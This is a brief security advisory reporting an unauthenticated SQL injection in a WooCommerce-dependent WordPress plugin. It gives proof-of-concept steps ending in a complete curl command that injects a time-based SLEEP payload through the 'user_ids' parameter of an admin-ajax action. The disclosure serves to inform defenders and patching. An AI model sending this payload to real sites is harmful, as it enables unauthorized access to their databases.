The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Proof of Concept
- Install WooCommerce (dependency, no setup required)
- Install the plugin, complete the wizard (no special configuration was performed - all defaults were accepted)
- As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" from the source
- Invoke the following curl command (with the extracted nonce in place) to induce a five second sleep:
time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"